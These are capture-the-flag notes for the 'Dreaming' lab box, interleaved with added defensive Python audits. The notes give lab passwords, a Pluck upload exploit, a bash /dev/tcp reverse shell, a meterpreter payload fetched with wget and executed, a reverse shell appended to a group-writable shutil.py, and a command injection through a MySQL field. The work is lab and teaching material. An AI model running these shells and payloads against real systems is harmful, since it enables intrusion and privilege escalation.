Dreaming
URLs
- dreaming.thm/app
- http://dreaming.thm/app/pluck-4.7.13/
- Vulnerable to CVE-2020-29607
Creds
- Pluck
  - password
- Lucien
  - Found in /opt/test.py
  - HeyLucien#@1999!
  - mysql -u lucien -plucien42DBPASSWORD
    - found in .bash_history
    - also found in /opt/test.py
- Death
  - Found SQL password in getDreams.py
  - !mementoMORI666!
  - This was reused as his login password
RCE
Using CVE-2020-29607, we can upload a PHP payload and get a p0wny web shell. From here, with a netcat listener running on our attacker box, we can create a full(ish) shell by doing:
1. bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
2. python3 -c 'import pty; pty.spawn("/bin/bash")'
From here, we can spin up a simple python3 http.server and send over a meterpreter payload.
Meterpreter
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.13.77.246 LPORT=4444 -f elf -o meterpreter.elf
and run a python server
python3 -m http.server 8080
In metasploit, create a listener
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 4444
run -j
Now, if we run:
cd /tmp
wget http://10.13.77.246:8080/meterpreter.elf
chmod +x meterpreter.elf
./meterpreter.elf
We should get a new session where we can begin running payloads
Vulnerabilities
CVE
- Pluck is vulnerable to CVE-2020-29607 (score 7.3)
- Due to default creds, this is guaranteed RCE
Escalations
Despite linpeas flagging CVE-2021-3560, this appears to be patched.
Permissions
- Running sudo -l we see lucien has permission to run:
    (death) NOPASSWD: /usr/bin/python3 /home/death/getDreams.py
- ROOT LOGIN
  - Sudo is not set up, and people keep logging in as root, which is terrible practice
  - Morpheus has passwordless sudo
    - He is essentially root
    - We can run
        sudo su -
      to test this, and sure enough, we get logged in as root
Password usage
Bad passwords
- pluck is using the password "password" on a public-facing website
Usage
- Passwords were found being used in cleartext in .bash_history
- Death reused his SQL password as his login
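As an added defensive example (not from these notes), a small history audit that flags credentials passed on the command line, the pattern behind the mysql line in the Creds section. The sample history lines are constructed, the pattern labels and the redaction helper are my own:

```python
import re

# Constructed sample history; the mysql -p line mirrors the one found in .bash_history.
SAMPLE_HISTORY = [
    "ls -la",
    "mysql -u lucien -plucien42DBPASSWORD",
    "mysql -u root --password=S3cret dreams",
    "mysql -u lucien -p",  # interactive prompt: no secret lands in the history file
    "curl -u admin:hunter2 http://dreaming.thm/app",
]

# (label, regex whose group 1 is the secret). The mysql pattern requires a
# non-empty value glued to -p; a bare "-p" prompts interactively and is fine.
CRED_PATTERNS = [
    ("mysql -p<secret>", re.compile(r"\bmysql\b.*?\s-p(?!\s|$)(\S+)")),
    ("--password=<secret>", re.compile(r"--password=(\S+)")),
    ("curl -u user:<secret>", re.compile(r"\bcurl\b.*?\s-u\s+\S+?:(\S+)")),
]


def redact(secret):
    """Keep a two-character prefix so the finding can be matched to a known
    credential without the report itself leaking the secret."""
    if len(secret) <= 2:
        return "*" * len(secret)
    return secret[:2] + "*" * (len(secret) - 2)


def find_cli_credentials(lines):
    """Return (line number, pattern label, redacted secret) for every history
    line that carries a credential as a command-line argument."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        for label, pattern in CRED_PATTERNS:
            match = pattern.search(line)
            if match:
                findings.append((lineno, label, redact(match.group(1))))
                break  # one finding per line is enough for a report
    return findings


if __name__ == "__main__":
    for lineno, label, secret in find_cli_credentials(SAMPLE_HISTORY):
        print(f"line {lineno}: {label} -> {secret}")
```

Run against a real ~/.bash_history by reading the file into a list of lines; the output never contains the full secret, so it is safe to attach to a ticket.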
Files
/home/death/getDreams.py
- This is owned by Death, but can be run as death via sudo by lucien.
- A copy with the password redacted can be found in /opt
- This tells us we can use SQL
/usr/lib/python3.8/shutil.py
- This file occurs in Death's vim history. Upon inspection, its permissions are incorrect:
    -rw-rw-r-- 1 root death 51K Mar 18 20:04 shutil.py
- Since death has group write on a standard-library module, we can append the following exploit to this file:
    echo 'open("/tmp/morpheus_flag.txt", "w").write(open("/home/morpheus/morpheus_flag.txt").read())' | tee -a /usr/lib/python3.8/shutil.py
- If we wait a few minutes, the script gets run by Morpheus and we get our file
- We can take this MUCH further by appending a reverse shell that reads its target from /tmp/.rev:
    import socket, subprocess, os
    try:
        # read "ip:port" from the drop file so the library never needs re-editing
        with open("/tmp/.rev", "r") as f:
            ip, port = f.read().strip().split(":")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, int(port)))
        # wire stdin/stdout/stderr to the socket before spawning bash
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        p = subprocess.call(["/bin/bash", "-i"])
    except:
        pass  # stay silent so the importing script keeps working
- Now we simply add our IP to .rev:
    echo '10.13.77.246:4444' > /tmp/.rev
- Wait a few minutes and we will get a shell as Morpheus
/home/morpheus/restore.py
- As previously noted, shutil.py is vulnerable due to group ownership by Death, and this script imports it:
    from shutil import copy2 as backup
    src_file = "/home/morpheus/kingdom"
    dst_file = "/kingdom_backup/kingdom"
    backup(src_file, dst_file)
    print("The kingdom backup has been done!")
- It seems Morpheus has a cron job running this file, based on observations when changing shutil.py as Death
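An added audit, not part of these notes, for the misconfiguration exploited above: a scan for group- or world-writable (or non-root-owned) files under the interpreter's sys.path, plus a parser for the ls -l mode string quoted above. The temporary-directory demo and its file names are constructed stand-ins for /usr/lib/python3.8:

```python
import os
import stat
import sys
import tempfile


def mode_string_is_group_or_world_writable(mode_str):
    """Parse an ls -l style mode such as '-rw-rw-r--' and report whether the
    group (position 5) or other (position 8) write bit is set."""
    if len(mode_str) != 10:
        raise ValueError("expected a 10-character ls -l mode string")
    return mode_str[5] == "w" or mode_str[8] == "w"


def find_writable_library_files(roots, trusted_uids=(0,)):
    """Walk each root and return (path, octal mode, uid, gid) for every regular
    file a non-root principal could modify: group- or world-writable, or owned
    by a uid outside trusted_uids. Anything here is a privilege-escalation path
    for whoever can run Python as a more privileged user (cron, sudo, root)."""
    findings = []
    for root in roots:
        if not os.path.isdir(root):
            continue
        for dirpath, _, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # vanished or unreadable: skip rather than abort
                if not stat.S_ISREG(st.st_mode):
                    continue
                loose_bits = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
                if loose_bits or st.st_uid not in trusted_uids:
                    findings.append(
                        (path, oct(stat.S_IMODE(st.st_mode)), st.st_uid, st.st_gid)
                    )
    return findings


def audit_sys_path():
    """Scan every directory on the running interpreter's import path."""
    return find_writable_library_files([p for p in sys.path if p])


def demo_in_tempdir():
    """Constructed stand-in for a library directory: one sane module (0644) and
    one with the 0664 mode seen on shutil.py. Returns the flagged base names."""
    with tempfile.TemporaryDirectory() as tmp:
        good = os.path.join(tmp, "good.py")
        bad = os.path.join(tmp, "shutil.py")
        for path in (good, bad):
            with open(path, "w") as f:
                f.write("# placeholder module\n")
        os.chmod(good, 0o644)
        os.chmod(bad, 0o664)
        # the temp files belong to us, so trust our own uid and test modes only
        hits = find_writable_library_files([tmp], trusted_uids=(os.getuid(),))
        return [os.path.basename(p) for p, _, _, _ in hits]


if __name__ == "__main__":
    print("demo flagged:", demo_in_tempdir())
    for path, mode, uid, gid in audit_sys_path():
        print(f"{mode} uid={uid} gid={gid} {path}")
```

Run as the user whose cron or sudo jobs import the interpreter; on the box above it would list shutil.py with mode 0o664 and gid of the death group, which is the fix: chmod 0644 and chgrp root.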
SQL
By logging into MySQL using Lucien's cleartext password, we can run some injections. Because getDreams.py runs as death via sudo and feeds the dream field to a command, whatever we put there executes as death:
    UPDATE dreams SET dream="test; cat /home/death/death_flag.txt > /tmp/death_flag.txt" WHERE dreamer="Alice";
Doing the same with
    cat /home/death/.*
we can dump all the history files.
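An added example (not the room's getDreams.py, whose source is not shown here): the pattern that makes the UPDATE above dangerous, a database value interpolated into a shell command string, next to a hardened form that hands the value to the child process as a single argv element. The "dreamt:" message format and the use of the Python interpreter as the child process are assumptions for the demo:

```python
import shlex
import subprocess
import sys

# Constructed row mirroring the UPDATE statement in the notes.
ALICE_DREAM = "test; cat /home/death/death_flag.txt > /tmp/death_flag.txt"

SHELL_METACHARS = set(";|&$`<>\n")


def unsafe_command_string(dreamer, dream):
    """The pattern the notes imply: the DB value is pasted into a shell command
    line. Returned, never executed here; under shell=True everything after ';'
    would run as a second command with the script's privileges."""
    return f"echo {dreamer} dreamt: {dream}"


def dream_contains_shell_metachars(dream):
    """Cheap detection for a value that would break out of a shell string."""
    return any(c in SHELL_METACHARS for c in dream)


def safe_argv(dreamer, dream):
    """Hardened form: one argv element per value, no shell in the path. The
    interpreter is used as the child so the demo runs anywhere Python does."""
    return [sys.executable, "-c", "import sys; print(sys.argv[1])",
            f"{dreamer} dreamt: {dream}"]


def run_safely(dreamer, dream):
    """Execute the argv form and return what the child printed; the ';' and
    the redirection survive only as text."""
    result = subprocess.run(safe_argv(dreamer, dream),
                            capture_output=True, text=True, check=True)
    return result.stdout.rstrip("\n")


def quoted_for_shell(dreamer, dream):
    """If a shell string is unavoidable, shlex.quote makes each value a single
    literal word so metacharacters lose their meaning."""
    return f"echo {shlex.quote(dreamer)} {shlex.quote(dream)}"


if __name__ == "__main__":
    print("unsafe:", unsafe_command_string("Alice", ALICE_DREAM))
    print("flagged:", dream_contains_shell_metachars(ALICE_DREAM))
    print("safe run:", run_safely("Alice", ALICE_DREAM))
    print("quoted:", quoted_for_shell("Alice", ALICE_DREAM))
```

The argv form is the fix to apply to a script like getDreams.py; the metacharacter check belongs in a detection rule over the table, since a legitimate dream has no reason to contain ';' or '>'.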